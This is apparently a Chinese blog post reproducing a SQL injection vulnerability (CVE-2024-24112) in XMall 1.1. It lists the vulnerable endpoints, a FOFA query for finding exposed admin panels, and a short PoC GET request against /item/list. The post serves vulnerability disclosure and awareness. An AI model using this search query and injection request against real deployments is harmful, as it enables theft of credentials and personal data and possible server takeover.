当前位置: 首页 > news >正文

XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

0x01 产品简介

XMall 开源电商商城 是开发者Exrick的一款基于SOA架构的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。

0x02 漏洞概述

XMall 开源商城 /item/list、/item/listSearch、/sys/log、/order/list、/member/list 、/member/list/remove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

xmall

1.1版本

0x04 复现环境

FOFA:app="XMall-后台管理系统"

0x05 漏洞复现

PoC

GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=d

相关文章:

  • 【白话前端】扫盲贴:Svg动画和Canvas动画区别
  • Linux_文件系统
  • Redis 的 SETNX
  • 【AIGC】Stable Diffusion的常见错误
  • 第9章 网络编程
  • 一分钟了解电脑关机快捷键是什么!
  • 2024年 前端JavaScript入门到精通 第一天
  • LabVIEW网络测控系统
  • C语言程序设计(第四版)—习题7程序设计题
  • 【AIGC】Stable Diffusion的ControlNet插件
  • Unity类银河恶魔城学习记录7-5 p71 Improving sword throwing state源代码
  • HCIA-HarmonyOS设备开发认证V2.0-内核扩展组件
  • Linux第57步_“linux系统镜像”和“根文件系统”重新打包小结
  • Llama-Factory的baichuan2微调
  • 2000-2021年县域指标统计数据库
  • -------------------- 第二讲-------- 第一节------在此给出链表的基本操作
  • 【comparator, comparable】小总结
  • Asm.js的简单介绍
  • javascript面向对象之创建对象
  • java小心机(3)| 浅析finalize()
  • vue总结
  • 分布式任务队列Celery
  • 设计模式走一遍---观察者模式
  • 视频flv转mp4最快的几种方法(就是不用格式工厂)
  • 要让cordova项目适配iphoneX + ios11.4,总共要几步?三步
  • 怎么把视频里的音乐提取出来
  • ​2020 年大前端技术趋势解读
  • ​油烟净化器电源安全,保障健康餐饮生活
  • (六)vue-router+UI组件库
  • (生成器)yield与(迭代器)generator
  • (十)c52学习之旅-定时器实验
  • (十二)springboot实战——SSE服务推送事件案例实现
  • (四)搭建容器云管理平台笔记—安装ETCD(不使用证书)
  • (转)c++ std::pair 与 std::make
  • (转)程序员疫苗:代码注入
  • ../depcomp: line 571: exec: g++: not found
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .NET Core WebAPI中使用swagger版本控制,添加注释
  • .net core 客户端缓存、服务器端响应缓存、服务器内存缓存
  • .NET 事件模型教程(二)
  • .NET 中什么样的类是可使用 await 异步等待的?
  • .net开源工作流引擎ccflow表单数据返回值Pop分组模式和表格模式对比
  • @angular/cli项目构建--http(2)
  • @EventListener注解使用说明
  • @JoinTable会自动删除关联表的数据
  • @manytomany 保存后数据被删除_[Windows] 数据恢复软件RStudio v8.14.179675 便携特别版...
  • [ 云计算 | AWS ] 对比分析:Amazon SNS 与 SQS 消息服务的异同与选择
  • [04]Web前端进阶—JS伪数组
  • [⑧ADRV902x]: Digital Pre-Distortion (DPD)学习笔记
  • [BT]BUUCTF刷题第8天(3.26)
  • [BZOJ 4598][Sdoi2016]模式字符串
  • [Golang]K-V存储引擎的学习 从零实现 (RoseDB mini版本)
  • [GXYCTF2019]BabySQli1
  • [I2C]I2C通信协议详解(二) --- I2C时序及规格指引
  • [I2C]I2C通信协议详解(一) --- 什么是I2C